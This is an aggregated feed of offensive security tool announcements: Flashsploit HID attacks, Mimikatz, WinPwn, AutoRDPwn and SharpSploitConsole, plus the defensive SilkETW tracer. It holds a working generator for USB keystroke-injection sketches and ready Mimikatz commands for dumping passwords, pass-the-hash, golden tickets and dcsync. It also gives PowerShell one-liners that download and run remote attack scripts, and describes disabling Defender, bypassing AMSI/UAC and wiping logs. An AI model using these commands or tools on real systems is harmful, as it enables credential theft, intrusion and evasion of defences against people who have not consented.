Flashsploit – Exploitation Framework For ATtiny85 Based HID Attacks

Flashsploit is an exploitation framework for attacks using ATtiny85 HID devices such as the Digispark USB development board. Flashsploit generates Arduino IDE compatible (.ino) scripts based on user input and then starts a listener in Metasploit-Framework if the script requires one. In summary: automatic script generation with automated msfconsole. Because the device works by typing keystrokes into whatever is in front of it, every script below needs a logged-in, unlocked session on the target and a few seconds of physical access to a USB port.

Features

TODO: Add Linux and OSX scripts

Windows

Data Exfiltration
• Extract all WiFi passwords and upload an XML file to an SFTP server
• Extract network configuration information of the target system and upload it to an SFTP server
• Extract passwords and other critical information using Mimikatz and upload them to an SFTP server

Reverse Shells
• Get a reverse shell by abusing Microsoft HTML Applications (mshta)
• Get a reverse shell by abusing the Certification Authority utility (certutil)
• Get a reverse shell by abusing Windows Script Host (cscript)
• Get a reverse shell by abusing Windows Installer (msiexec)
• Get a reverse shell by abusing the Microsoft Register Server utility (regsvr32)

Miscellaneous
• Change the wallpaper of the target machine
• Make Windows unresponsive using a .bat script (100% CPU and RAM usage)
• Drop and execute a file of your choice (a ransomware maybe? ;))
• Disable the Windows Defender service on the target machine

Tested on
• Kali Linux 2019.2
• BlackArch Linux

Dependencies

Flashsploit depends on 4 packages which are generally pre-installed in major pentest distributions:
• Metasploit-Framework
• Python 3
• SFTP
• PHP

If you think I should still make an install script, open an issue.

Usage

git clone https://github.com/thewhiteh4t/flashsploit.git
cd flashsploit
python3 flashsploit.py

Download Flashsploit
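The mechanism behind every Windows script Flashsploit generates is the same: the Digispark enumerates as a USB keyboard, opens the Run dialog with Win+R, types a one-liner and presses Enter. The generator below is an added example, not Flashsploit's own code; the `DigiKeyboard.h` calls (`sendKeyStroke`, `print`, `delay`) come from the Digistump Arduino core, while the delays, the C-string escaping rules and the sample command are this example's assumptions. The escaping is the part that bites in practice, since mshta/certutil one-liners carry quotes and backslashes that would otherwise break the sketch or change the typed command.

```python
"""Generate a Digispark (ATtiny85) keystroke-injection sketch.

Added example, not Flashsploit's own generator. It reproduces the mechanism
behind the framework's Windows scripts: the board enumerates as a USB
keyboard, opens the Run dialog with Win+R, types one command line and presses
Enter. DigiKeyboard.h and its sendKeyStroke/print/delay calls come from the
Digistump Arduino core; the delays and the sample command are placeholders.
"""


def c_string_literal(text: str) -> str:
    """Escape text as a C double-quoted string literal for the sketch.

    Windows one-liners are full of backslashes (paths) and double quotes
    (mshta, certutil and PowerShell arguments); left unescaped they either
    fail to compile or silently change the command that gets typed.
    """
    out = []
    for ch in text:
        if ch == "\\":
            out.append("\\\\")
        elif ch == '"':
            out.append('\\"')
        elif ch in "\r\n":
            raise ValueError("newlines are not allowed; the sketch presses Enter itself")
        elif not 0x20 <= ord(ch) <= 0x7E:
            # DigiKeyboard translates characters through a US-ASCII table only;
            # anything else is typed wrong (or not at all) on the target.
            raise ValueError(f"character {ch!r} cannot be typed by DigiKeyboard")
        else:
            out.append(ch)
    return '"' + "".join(out) + '"'


def digispark_sketch(command: str, boot_delay_ms: int = 2000,
                     dialog_delay_ms: int = 500) -> str:
    """Return an Arduino .ino that types `command` into the Windows Run dialog.

    boot_delay_ms gives the host time to finish USB enumeration before the
    first real keystroke; dialog_delay_ms waits for the Run dialog to appear.
    Both values are guesses to tune per target, not Flashsploit's defaults.
    """
    if boot_delay_ms < 0 or dialog_delay_ms < 0:
        raise ValueError("delays must be non-negative")
    literal = c_string_literal(command)
    lines = [
        '#include "DigiKeyboard.h"',
        "",
        "void setup() {",
        "  // Nothing to configure: the USB HID interface is set up by the library.",
        "}",
        "",
        "void loop() {",
        "  // An empty report keeps the host's HID driver happy before real input.",
        "  DigiKeyboard.sendKeyStroke(0);",
        f"  DigiKeyboard.delay({boot_delay_ms});",
        "  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);  // Win+R opens the Run dialog",
        f"  DigiKeyboard.delay({dialog_delay_ms});",
        f"  DigiKeyboard.print({literal});",
        "  DigiKeyboard.sendKeyStroke(KEY_ENTER);",
        "  // Run once. DigiKeyboard.delay() keeps servicing USB, so the device",
        "  // stays enumerated instead of being dropped by the host.",
        "  for (;;) {",
        "    DigiKeyboard.delay(1000);",
        "  }",
        "}",
    ]
    return "\n".join(lines) + "\n"


# Placeholder command (not one of Flashsploit's payloads); it carries the
# quoting and backslashes a real one-liner would.
SAMPLE_COMMAND = r'cmd /c echo "hello" > C:\Users\Public\hid.txt'

if __name__ == "__main__":
    print(digispark_sketch(SAMPLE_COMMAND), end="")
```

Save the output as a `.ino`, open it in the Arduino IDE with the Digistump board package installed and flash it. Two checks worth doing before a real engagement: DigiKeyboard assumes a US keyboard layout, so a target with another layout will receive swapped characters, and the boot delay usually has to be raised on hosts that install the HID driver slowly.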

Link: http://feedproxy.google.com/~r/PentestTools/~3/lPG04RLt5rk/flashsploit-exploitation-framework-for.html

UPDATE: MITRE CALDERA 2.0

PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in this
Read more about UPDATE: MITRE CALDERA 2.0
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/

SilkETW – Flexible C# Wrapper For ETW (Event Tracing for Windows)

SilkETW is a flexible C# wrapper for ETW. It is meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While SilkETW has obvious defensive (and offensive) applications, it is primarily a research tool in its current state.

For easy consumption, output data is serialized to JSON. The JSON data can either be analyzed locally using PowerShell or shipped off to 3rd-party infrastructure such as Elasticsearch.

Implementation Details

Libraries
SilkETW is built on .NET v4.5 and uses a number of 3rd-party libraries, as shown below. Please see LICENSE-3RD-PARTY for further details.

ModuleId                                  Version  LicenseUrl
--------                                  -------  ----------
McMaster.Extensions.CommandLineUtils      2.3.2    https://licenses.nuget.org/Apache-2.0
Microsoft.Diagnostics.Tracing.TraceEvent  2.0.36   https://github.com/Microsoft/perfview/blob/master/LICENSE.TXT
Newtonsoft.Json                           12.0.1   https://licenses.nuget.org/MIT
System.ValueTuple                         4.4.0    https://github.com/dotnet/corefx/blob/master/LICENSE.TXT
YaraSharp                                 1.3.1    https://github.com/stellarbear/YaraSharp/blob/master/LICENSE

Command Line Options
Command line usage is fairly straightforward and user input is validated in the execution prologue. See the image below for further details. Note that kernel tracing (-t kernel) needs an elevated prompt.

JSON Output Structure
The JSON output, prior to serialization, is formatted according to the following C# struct.

public struct EventRecordStruct
{
    public Guid ProviderGuid;
    public List<string> YaraMatch;
    public string ProviderName;
    public string EventName;
    public TraceEventOpcode Opcode;
    public string OpcodeName;
    public DateTime TimeStamp;
    public int ThreadID;
    public int ProcessID;
    public string ProcessName;
    public int PointerSize;
    public int EventDataLength;
    public Hashtable XmlEventData;
}

Note that, depending on the provider and the event type, you will have variable data in the XmlEventData hash table. Sample JSON output can be seen below for "Microsoft-Windows-Kernel-Process" -> "ThreadStop/Stop".

{
  "ProviderGuid": "22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716",
  "YaraMatch": [],
  "ProviderName": "Microsoft-Windows-Kernel-Process",
  "EventName": "ThreadStop/Stop",
  "Opcode": 2,
  "OpcodeName": "Stop",
  "TimeStamp": "2019-03-03T17:58:14.2862348+00:00",
  "ThreadID": 11996,
  "ProcessID": 8416,
  "ProcessName": "",
  "PointerSize": 8,
  "EventDataLength": 76,
  "XmlEventData": {
    "FormattedMessage": "Thread 11,996 (in Process 8,416) stopped. ",
    "StartAddr": "0x7fffe299a110",
    "ThreadID": "11,996",
    "UserStackLimit": "0x3d632000",
    "StackLimit": "0xfffff38632d39000",
    "MSec": "560.5709",
    "TebBase": "0x91c000",
    "CycleTime": "4,266,270",
    "ProcessID": "8,416",
    "PID": "8416",
    "StackBase": "0xfffff38632d40000",
    "SubProcessTag": "0",
    "TID": "11996",
    "ProviderName": "Microsoft-Windows-Kernel-Process",
    "PName": "",
    "UserStackBase": "0x3d640000",
    "EventName": "ThreadStop/Stop",
    "Win32StartAddr": "0x7fffe299a110"
  }
}

Usage

Filter data in PowerShell
You can import JSON output from SilkETW in PowerShell using the following simple function (the output file holds one JSON object per line, which is why it is read line by line).

function Get-SilkData {
    param($Path)
    $JSONObject = @()
    Get-Content $Path | ForEach-Object {
        $JSONObject += $_ | ConvertFrom-Json
    }
    $JSONObject
}

In the example below we will collect process event data from the kernel provider and use image loads to identify Mimikatz execution. We can collect the required data with the following command.

SilkETW.exe -t kernel -kk ImageLoad -ot file -p C:\Users\b33f\Desktop\mimikatz.json

With data in hand it is easy to sort, grep and filter for the properties we are interested in.

Yara
SilkETW includes Yara functionality to filter or tag event data. Again, this has obvious defensive capabilities but it can just as easily be used to augment your ETW research.

In this example we will use the following Yara rule to detect Seatbelt execution in memory through Cobalt Strike's execute-assembly.

rule Seatbelt_GetTokenInformation
{
    strings:
        $s1 = "ManagedInteropMethodName=GetTokenInformation" ascii wide nocase
        $s2 = "TOKEN_INFORMATION_CLASS" ascii wide nocase
        $s3 = /bool\(native int,valuetype \w+\.\w+\/\w+,native int,int32,int32&/
        $s4 = "locals (int32,int64,int64,int64,int64,int32& pinned,bool,int32)" ascii wide nocase
    condition:
        all of ($s*)
}

We can start collecting .NET ETW data with the following command. The "-yo" option here indicates that we should only write Yara matches to disk!

SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -l verbose -y C:\Users\b33f\Desktop\yara -yo matches -ot file -p C:\Users\b33f\Desktop\yara.json

We can see at runtime that our Yara rule was hit.

Note also that we are only capturing a subset of the "Microsoft-Windows-DotNETRuntime" events (0x2038), specifically: JitKeyword, InteropKeyword, LoaderKeyword and NGenKeyword. The mask is the OR of the CLR keyword bits LoaderKeyword (0x8), JitKeyword (0x10), NGenKeyword (0x20) and InteropKeyword (0x2000); keep it this narrow, because the full DotNETRuntime provider is extremely chatty.

Changelog
For details on version specific changes, please refer to the Changelog.

Download SilkETW
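The ImageLoad walkthrough above stops at "sort, grep and filter". The script below is an added example, not part of SilkETW, that does the filtering end to end on the one-object-per-line JSON the tool writes with -ot file: it groups kernel image-load events per process and flags any process that maps most of the DLLs a Mimikatz-style credential dump pulls in (samlib, vaultcli, winscard, cryptdll, hid). The DLL set, the threshold, and the "Image/Load" event name and "FileName" payload key are this example's assumptions about what TraceEvent emits for the ImageLoad keyword; check them against a real capture. The sample lines are constructed, not real SilkETW output.

```python
"""Triage SilkETW JSON output for Mimikatz-like image-load activity.

Added example, not SilkETW's own code. Reads the one-JSON-object-per-line
file SilkETW writes with "-ot file" (the layout Get-SilkData consumes), groups
kernel ImageLoad events per process and flags processes that map most of the
credential-access DLLs a Mimikatz-style dump pulls in. The DLL set, threshold,
"Image/Load" event name and "FileName" payload key are assumptions.
"""
import json
from typing import Dict, Iterable, List, Set, Tuple

# Heuristic chosen for this example; tune the set and threshold on your data.
SUSPECT_DLLS = {"samlib.dll", "vaultcli.dll", "winscard.dll", "cryptdll.dll", "hid.dll"}

# Assumed TraceEvent names/keys for the kernel ImageLoad keyword. Inspect the
# EventName and XmlEventData of a real record and adjust.
IMAGE_LOAD_EVENTS = {"Image/Load", "Image/DCStart"}
FILENAME_KEYS = ("FileName", "ImageName")


def load_events(lines: Iterable[str]) -> List[dict]:
    """Parse SilkETW output, one JSON object per line. Blank lines and a
    truncated last line (capture stopped mid-write) are skipped, not fatal."""
    events: List[dict] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def image_basename(event: dict) -> str:
    """Lower-cased file name of the loaded image. Kernel events carry NT device
    paths (\\\\Device\\\\HarddiskVolumeN\\\\...), so split on the last separator."""
    payload = event.get("XmlEventData") or {}
    for key in FILENAME_KEYS:
        path = payload.get(key)
        if path:
            return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return ""


def image_loads_by_pid(events: Iterable[dict]) -> Dict[int, Tuple[str, Set[str]]]:
    """Map ProcessID -> (ProcessName, set of image basenames it loaded)."""
    loads: Dict[int, Tuple[str, Set[str]]] = {}
    for ev in events:
        if ev.get("EventName") not in IMAGE_LOAD_EVENTS:
            continue
        name = image_basename(ev)
        if not name:
            continue
        pid = int(ev.get("ProcessID", -1))
        loads.setdefault(pid, (ev.get("ProcessName", ""), set()))[1].add(name)
    return loads


def flag_processes(events: Iterable[dict], suspect: Set[str] = SUSPECT_DLLS,
                   threshold: int = 4) -> List[Tuple[int, str, List[str]]]:
    """(pid, process name, matched DLLs) for every process that loaded at
    least `threshold` of the suspect DLLs, ordered by pid."""
    hits = []
    for pid, (pname, images) in image_loads_by_pid(events).items():
        matched = sorted(images & suspect)
        if len(matched) >= threshold:
            hits.append((pid, pname, matched))
    return sorted(hits, key=lambda h: h[0])


def _record(event_name: str, pid: int, pname: str, filename: str = "") -> str:
    """One SilkETW-style line, trimmed to the fields this triage reads."""
    rec = {"ProviderName": "Windows Kernel", "EventName": event_name, "YaraMatch": [],
           "ProcessID": pid, "ProcessName": pname, "XmlEventData": {}}
    if filename:
        rec["XmlEventData"]["FileName"] = filename
    return json.dumps(rec)


_SYS32 = r"\Device\HarddiskVolume3\Windows\System32"

# Constructed sample capture: benign loads by explorer, a process mapping the
# whole suspect set, one non-ImageLoad event, an empty line and a cut-off line.
SAMPLE_LINES = [
    _record("Image/Load", 1337, "explorer", _SYS32 + r"\kernel32.dll"),
    _record("Image/Load", 1337, "explorer", _SYS32 + r"\hid.dll"),
    _record("Image/Load", 4242, "mimikatz", _SYS32 + r"\samlib.dll"),
    _record("Image/Load", 4242, "mimikatz", _SYS32 + r"\vaultcli.dll"),
    _record("Image/Load", 4242, "mimikatz", _SYS32 + r"\WinSCard.dll"),
    _record("Image/Load", 4242, "mimikatz", _SYS32 + r"\cryptdll.dll"),
    _record("Image/Load", 4242, "mimikatz", _SYS32 + r"\hid.dll"),
    _record("ThreadStop/Stop", 4242, "mimikatz"),
    "",
    '{"EventName": "Image/Load", "ProcessID": 4242, "XmlEventData": {"File',
]

if __name__ == "__main__":
    for pid, pname, dlls in flag_processes(load_events(SAMPLE_LINES)):
        print(f"PID {pid} ({pname or 'unknown'}): {', '.join(dlls)}")
```

Against a real capture, replace SAMPLE_LINES with `open(r"C:\Users\b33f\Desktop\mimikatz.json", encoding="utf-8")`. Explorer loading hid.dll on its own is not flagged at the default threshold, which is the point of counting the combination rather than any single DLL; lowering the threshold to 1 shows how noisy the individual indicators are.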

Link: http://feedproxy.google.com/~r/PentestTools/~3/BJmvoNfqSg4/silketw-flexible-c-wrapper-for-etw.html

Mimikatz v2.2.0 – A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

mimikatz is a tool I've made to learn C and make some experiments with Windows security.

It's now well known to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

But that's not all! Crypto, Terminal Server, Events, ... lots of information in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).

If you don't want to build it, binaries are available on https://github.com/gentilkiwi/mimikatz/releases

Quick usage

Most of the sekurlsa, lsadump and token commands below read LSASS memory or the SAM/LSA secrets, so they need a local administrator context: privilege::debug enables SeDebugPrivilege for the LSASS reads, and token::elevate switches to SYSTEM for the registry-backed lsadump and vault commands.

log
privilege::debug

sekurlsa
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export

vault & lsadump
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build

mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
• for mimikatz and mimilib: Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 – http://www.microsoft.com/download/details.aspx?id=44914)
• for mimikatz driver, mimilove (and ddk2003 platform): Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800

mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even the GIT incorporated in Visual Studio 2013 =)

Synchronize!
GIT URL is: https://github.com/gentilkiwi/mimikatz.git
SVN URL is: https://github.com/gentilkiwi/mimikatz/trunk
ZIP file is: https://github.com/gentilkiwi/mimikatz/archive/master.zip

Build the solution
After opening the solution, Build / Build Solution (you can change architecture). mimikatz is now built and ready to be used! (Win32 / x64)
You can get error MSB3073 about _build_.cmd and mimidrv; it's because the driver cannot be built without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.

ddk2003
With this optional MSBuild platform, you can use the WinDDK build tools and the default msvcrt runtime (smaller binaries, no dependencies). For this optional platform, Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
Follow instructions:
http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Licence
CC BY 4.0 licence – https://creativecommons.org/licenses/by/4.0/

mimikatz needs coffee to be developed:
ETH: 0x3a56af999b5e68f9e6e0a7dce1833efefad5b470
BTC: 1C6bubazp9xq3BfYiHvsqP1sEhFYykUDo5
PayPal: https://www.paypal.me/delpy/

Author
Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
The DCSync function in the lsadump module was co-written with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

This is a personal development, please respect its philosophy and don't use it for bad things!

Download Mimikatz

Link: http://www.kitploit.com/2019/04/mimikatz-v220-post-exploitation-tool-to.html

WinPwn – Automation For Internal Windows Penetrationtest

In many past internal penetration tests I often had problems with the existing PowerShell recon / exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large offensive security PowerShell projects. I only load them one after the other into RAM via IEX DownloadString and partially automate the execution to save time.

Yes, it is not C# and it may be flagged by antivirus solutions. Windows Defender, for example, blocks some of the known scripts/functions.

Different local recon modules, domain recon modules, privilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!

Just import the modules with "Import-Module .\WinPwn_v0.7.ps1" or with
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')
(the second form runs whatever is currently on the master branch, unpinned; the same applies to every upstream script the modules pull in at run time).

Functions available after import:
• WinPwn -> Guides the user through all functions/modules with simple questions.
• Inveigh -> Executes Inveigh in a new console window (https://github.com/Kevin-Robertson/Inveigh), SMB relay attacks with session management afterwards
• sessionGopher -> Executes SessionGopher and asks for parameters (https://github.com/Arvanaghi/SessionGopher)
• Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit)
• localreconmodules -> Executes Get-Computerdetails and Just another Windows Privilege escalation script + Winspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS)
• JAWS -> Just another Windows Privilege Escalation script gets executed
• domainreconmodules -> Different PowerView situational awareness functions get executed and the output stored on disk. In addition a user list for DomainPasswordSpray gets stored on disk. An AD report is generated in CSV files (or XLS if Excel is installed) with ADRecon. (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray)
• Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump)
• lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne)
• latmov -> Searches for systems with admin access in the domain for lateral movement. Mass-Mimikatz can be used afterwards on the found systems. DomainPasswordSpray for new credentials can also be used here.
• empirelauncher -> Launch a PowerShell Empire one-liner on remote systems (https://github.com/EmpireProject/Empire)
• shareenumeration -> Invoke-FileFinder and Invoke-ShareFinder from PowerView (PowerSploit)
• groupsearch -> Get-DomainGPOUserLocalGroupMapping – find systems where you have admin access or RDP access via Group Policy mapping (PowerView / PowerSploit)
• Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
• isadmin -> Checks for local admin access on the local system
• Sharphound -> Downloads SharpHound and collects information for the BloodHound DB
• adidnswildcard -> Creates an Active Directory-Integrated DNS wildcard record and runs Inveigh for mass hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard)

The "oBEJHzXyARrq.exe" executable is an obfuscated version of jaredhaight's PSAttack tool for AppLocker/PS restriction bypass (https://github.com/jaredhaight/PSAttack).

Todo:
• Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.
• Proxy options via PAC file are not correctly found at the moment.

Legal disclaimer:
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

Download WinPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/9lPHNu1cvU8/winpwn-automation-for-internal-windows.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. The attack abuses Remote Desktop session shadowing: a remote attacker with sufficient privileges on the target can view the victim's desktop without their consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements
• PowerShell 4.0 or higher

Changes
Version 4.8
• Compatibility with PowerShell 4.0
• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)
• Automatic exclusion in Windows Defender (4 different methods)
• Remote execution without password for PsExec, WMI and Invoke-Command
• New attack available: DCOM Passwordless Execution
• New module available: Remote Access / Metasploit Web Delivery
• New module available: Remote VNC Server (designed for legacy environments)
• Autocomplete the host, user and password fields by pressing Enter
• It is now possible to run the tool without administrator privileges with the -noadmin parameter
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.

One-line execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

RDP Servers, Mimikatz, & LibreOffice – Hack Naked News #206

    This week, RDP Servers Can Hack Client Devices, Roughly 500,000 Ubiquiti devices may be affected by a flaw already exploited in the wild, Crypto exchange in limbo after the founder dies with password, Home DNA kit company says it's working with the FBI, Outlaw Shellbot infects Linux servers to mine for Monero, Apple's […]
The post RDP Servers, Mimikatz, & LibreOffice – Hack Naked News #206 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/6ydFfgEPIFk/

UPDATE: Infection Monkey 1.6.1

I'm sure you must have read my previous post titled the List of Adversary Emulation Tools. In that post, I briefly mentioned the Guardicore Infection Monkey. Good news now is that it has been updated! We now have Infection Monkey 1.6.1. An important change about this version is that this is an AWS only
Read more about UPDATE: Infection Monkey 1.6.1
The post UPDATE: Infection Monkey 1.6.1 appeared first on PenTestIT.

Link: http://pentestit.com/update-infection-monkey-1-6-1/

AutoRDPwn v4.5 – The Shadow Attack Framework

AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. The attack abuses Remote Desktop session shadowing: a remote attacker with sufficient privileges on the target can view the victim's desktop without their consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements
• PowerShell 5.0 or higher

Changes
Version 4.5
• New ninja style icon!
• Automatic cleaning of PowerShell history after execution
• Now all dependencies are downloaded from the same repository
• Many errors and bugs fixed
• UAC & AMSI bypass in 64-bit systems
• New module available: Remote Desktop Caching
• New module available: Disable system logs (Invoke-Phant0m)
• New module available: Sticky Keys Hacking
• New module available: Remote Desktop History
• New attack available: Session Hijacking (passwordless). WARNING! This attack is very intrusive and can only be used locally
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.

One-line execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZHHxiH4qJi0/autordpwn-v45-shadow-attack-framework.html

SharpSploitConsole – Console Application Designed To Interact With SharpSploit

Console application designed to interact with SharpSploit, released by @cobbr_io.

SharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community into one sweet DLL. It's awesome so check it out!

Description
SharpSploitConsole is just a quick proof-of-concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit. By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target system and run over a non-interactive shell (such as beacon).

This concept can be applied to many C# binaries. For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn't rely on the System.Management.Automation.dll on the target system.

Contact at:
Twitter: @anthemtotheego or @g0ldengunsec

Setup – Quick and Dirty
Note: For those of you who don't want to go through the trouble of compiling your own, I uploaded an x64 and x86 binary found in the CompiledBinaries folder. For those of you who do want to compile your own... I used Windows 10, Visual Studio 2017 – mileage may vary.

1. Download the SharpSploit tool from https://github.com/cobbr/SharpSploit.git
2. Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for the correct architecture). You should see a drop-down with Any CPU > click on it and open Configuration Manager > under platform change to the desired architecture and select OK.
3. Download the SharpSploitConsole tool and open up SharpSploitConsole.sln
4. Copy both SharpSploit.dll and System.Management.Automation.dll found in the SharpSploit/bin/x64/Debug directory into the SharpSploitConsole/bin/x64/Debug folder
5. Next we will set up Visual Studio to embed our DLLs into our exe so we can just have a single binary we can run on our target machine. We will do this by doing the following in Visual Studio:
   a. Tools > NuGet Package Manager > Package Manager Console
   b. Inside the console run: Install-Package Costura.Fody
   c. Open up Notepad, paste the following code and save it with the name FodyWeavers.xml inside the SharpSploitConsole directory that holds your bin, obj, Properties folders.
      <Weavers>
        <Costura />
      </Weavers>
6. Inside Visual Studio, right-click References on the right-hand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLLs, select them and add them.
7. Compile, drop the binary on the target computer and have fun.

Examples
Note: All commands are case insensitive.

By default all commands can be taken in as command line args; they will be executed and the program will exit (great for remote shells). This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell.

Start interactive console mode:
Interact

Mimikatz all the things (does not run DCSync) – requires admin or system:
Mimi-All

Runs a specific Mimikatz command of your choice – requires admin or system:
Mimi-Command privilege::debug sekurlsa::logonPasswords

Runs the Mimikatz command privilege::debug sekurlsa::logonPasswords – requires admin or system:
logonPasswords

Runs the Mimikatz command to retrieve Domain Cached Credentials hashes from the registry – requires admin or system:
LsaCache

Runs the Mimikatz command to retrieve LSA Secrets stored in the registry – requires admin or system:
LsaSecrets

Retrieve password hashes from the SAM database – requires admin or system:
SamDump

